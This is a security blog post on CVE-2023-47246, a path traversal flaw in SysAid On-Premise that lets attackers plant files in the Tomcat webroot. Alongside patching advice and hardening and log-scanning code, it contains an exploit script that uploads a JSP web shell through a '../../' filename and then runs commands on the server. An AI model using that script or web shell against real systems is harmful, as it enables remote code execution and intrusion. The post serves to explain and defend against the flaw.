In November 2023, security researchers discovered a dangerous vulnerability (CVE-2023-47246) in the SysAid On-Premise platform, versions before 23.3.36. The bug quickly became a hot topic after attackers in the wild used it to break into systems. In this post, we'll explain how this vulnerability works, how attackers exploit it, and what you can do to stay safe.

What Is CVE-2023-47246?

CVE-2023-47246 is a "path traversal" vulnerability found in SysAid On-Premise, an IT service management platform. Path traversal means an attacker can trick the server into saving files outside of the intended directory, allowing them to write files anywhere on the disk where the server process has permissions—even the web server's root folder.

This flaw is particularly dangerous because SysAid runs on Apache Tomcat, a popular Java servlet container and web server. If an attacker can upload a malicious JSP (JavaServer Pages) file into Tomcat's webroot, Tomcat will compile and execute it, giving the attacker arbitrary code execution on the server.

How Does the Exploit Work?

Attackers usually look for a web endpoint in SysAid that allows file uploads—often intended for things like submitting support tickets with attachments. If the code that handles those uploads doesn't properly check the file path, an attacker can sneak directory traversal sequences (like ../../) into the submitted filename. This moves the uploaded file out of the expected directory and into a sensitive one—like the root directory served by Tomcat.

Once a malicious file (like shell.jsp) exists in the Tomcat webroot, an attacker can access it directly via the browser. Tomcat will treat the JSP file as active code and run it. This lets the attacker take control of the server.
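The root cause described above is an upload handler that joins the client-supplied filename onto the upload directory without checking where the result lands. The following Python is an added illustration written for this post, not SysAid's code: it places the flawed pattern next to a hardened version that strips directory components, applies a filename allowlist, refuses server-executable extensions, and confirms the resolved path is still inside the upload directory. The upload directory path used here is a made-up placeholder.

```python
import re
from pathlib import Path


def vulnerable_save_path(upload_dir: str, filename: str) -> str:
    """The flawed pattern: trust the client-supplied filename verbatim.

    '../' segments in the name walk out of upload_dir, so the file can be
    written anywhere the server process may write (e.g. a Tomcat webroot).
    """
    return str(Path(upload_dir).joinpath(filename).resolve())


def safe_save_path(upload_dir: str, filename: str):
    """Hardened pattern. Returns the path to write, or None if rejected.

    1. Keep only the last path component (handles '/' and '\\' separators).
    2. Accept only a tight character allowlist; reject '.' and '..'.
    3. Refuse extensions Tomcat would execute (defence in depth; an
       attachment store should never hold active content).
    4. Resolve the final path and verify it is still under upload_dir.
    """
    base_dir = Path(upload_dir).resolve()
    name = re.split(r"[\\/]", filename)[-1]
    if name in ("", ".", "..") or not re.fullmatch(r"[A-Za-z0-9._-]{1,255}", name):
        return None
    if name.lower().endswith((".jsp", ".jspx", ".war", ".jar")):
        return None
    candidate = (base_dir / name).resolve()
    # Containment check: base_dir must be an ancestor of the resolved path.
    if base_dir not in candidate.parents:
        return None
    return str(candidate)


# Placeholder upload directory (constructed for this example, not SysAid's real path).
UPLOAD_DIR = "/opt/example-helpdesk/attachments"

if __name__ == "__main__":
    traversal = "../../webapps/ROOT/shell.jsp"
    print("vulnerable:", vulnerable_save_path(UPLOAD_DIR, traversal))
    print("hardened:  ", safe_save_path(UPLOAD_DIR, traversal))
    print("hardened:  ", safe_save_path(UPLOAD_DIR, "ticket-1042.pdf"))
```

Note that step 1 alone already defeats the traversal; the final containment check is there so that a future change to the naming logic (or a symlink inside the upload tree) cannot silently reintroduce the escape.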

Here's a simplified example showing what an attack might look like:

import requests

# Update these values:
TARGET = "http://victim.example.com"
UPLOAD_ENDPOINT = TARGET + "/some/upload/endpoint"
WEBROOT = "../../webapps/ROOT/"
SHELL_NAME = "shell.jsp"

# A basic JSP web shell.
jsp_shell = '''<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        int c;
        while ((c = in.read()) != -1) out.print((char)c);
        in.close();
    }
%>
'''

files = {
    # The core trick --
    # Use the filename parameter to break out of the intended folder!
    "file": (WEBROOT + SHELL_NAME, jsp_shell, "application/octet-stream")
}
data = {
    "other_form_fields": "values"  # Add any fields required by the API.
}

r = requests.post(UPLOAD_ENDPOINT, files=files, data=data)
if r.status_code == 200:
    print("Upload likely succeeded.")

print(f"Now visit {TARGET}/{SHELL_NAME}?cmd=whoami to run commands.")

When run, this will upload a file called shell.jsp to the Tomcat webroot. The attacker can then visit http://victim.example.com/shell.jsp?cmd=whoami and run any Linux command they wish!

Real-World Exploitation

According to the Huntress Labs report, attackers started using this bug in the wild within days of its discovery. Some of the first attacks were tied to a group believed to be associated with ransomware campaigns.

How to Protect Yourself

1. Patch! Download and install SysAid On-Premise version 23.3.36 or later (see the official advisory under Resources & References below).
2. Search for Malicious Files: Check your Tomcat webroot (often /opt/sysaid/tomcat/webapps/ROOT/ or similar) for unexpected .jsp files. Remove anything suspicious.
3. Audit Uploads: Review your system logs for file upload activity, especially entries with suspicious filenames containing ../ or targeting directories outside of the intended upload folder.
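Steps 2 and 3 can be scripted. The Python below is an added example for this post, not a SysAid or Huntress tool: one function lists server-executable files in a webroot that are not in a known-good baseline, and another flags upload log entries whose filename carries a traversal sequence, URL-decoding first so that encoded variants such as %2e%2e%2f are not missed. The log format is constructed for the example; adapt the regex to whatever your application actually writes.

```python
import os
import re
from urllib.parse import unquote

# Extensions Tomcat will execute if they appear under a deployed webapp.
EXECUTABLE_EXTENSIONS = (".jsp", ".jspx", ".war")

# Traversal sequences, matched after URL-decoding.
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")


def find_unexpected_webroot_files(relative_paths, known_good=frozenset()):
    """Return executable files (relative paths) not present in the baseline."""
    hits = []
    for p in relative_paths:
        norm = p.replace("\\", "/")
        if norm.lower().endswith(EXECUTABLE_EXTENSIONS) and norm not in known_good:
            hits.append(norm)
    return sorted(hits)


def walk_webroot(webroot, known_good=frozenset()):
    """Apply the same check to a real directory tree on disk."""
    rel = []
    for dirpath, _, filenames in os.walk(webroot):
        for f in filenames:
            rel.append(os.path.relpath(os.path.join(dirpath, f), webroot))
    return find_unexpected_webroot_files(rel, known_good)


def find_traversal_uploads(log_lines):
    """Return (line_no, decoded_filename) for upload entries with traversal.

    Decoding is applied twice so double-encoded names are also caught.
    """
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'filename="([^"]*)"', line)
        if not m:
            continue
        name = unquote(unquote(m.group(1)))
        if TRAVERSAL_RE.search(name):
            findings.append((n, name))
    return findings


# Constructed sample log lines (hypothetical format, not SysAid's real log).
SAMPLE_LOG = [
    '2023-11-10 06:15:30 INFO attachment saved filename="invoice.pdf" ticket=1042',
    '2023-11-10 06:16:02 INFO attachment saved filename="../../webapps/ROOT/shell.jsp" ticket=1043',
    '2023-11-10 06:16:40 INFO attachment saved filename="%2e%2e%2f%2e%2e%2fwebapps%2fROOT%2fcmd.jsp" ticket=1044',
    '2023-11-10 06:17:11 INFO attachment saved filename="report..final.docx" ticket=1045',
]

# Constructed webroot listing; index.jsp is the only file in the baseline.
SAMPLE_WEBROOT_LISTING = ["index.jsp", "css/site.css", "shell.jsp", "img/logo.png"]
KNOWN_GOOD = frozenset({"index.jsp"})

if __name__ == "__main__":
    print("unexpected files:", find_unexpected_webroot_files(SAMPLE_WEBROOT_LISTING, KNOWN_GOOD))
    for line_no, name in find_traversal_uploads(SAMPLE_LOG):
        print(f"line {line_no}: traversal in filename {name!r}")
```

Build the known-good baseline from a clean install or a backup taken before the disclosure date, and run walk_webroot against every deployed webapp directory, not just ROOT. The fourth sample line shows why the pattern anchors on a separator: a name like report..final.docx contains two dots but no traversal, and flagging it would add noise.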

Resources & References

- SysAid Security Advisory (Official)
- Huntress Labs (In-the-wild Exploitation)
- NIST NVD Entry for CVE-2023-47246

Conclusion

CVE-2023-47246 exemplifies how a simple coding mistake—failing to sanitize file paths—can lead to full server compromise. If you run SysAid On-Premise, patch immediately, check your server, and make sure your uploads can't be abused in this way. Cybercriminals move fast when these bugs make headlines, so don't wait!

Timeline

Published on: 11/10/2023 06:15:30 UTC
Last modified on: 11/13/2023 17:28:37 UTC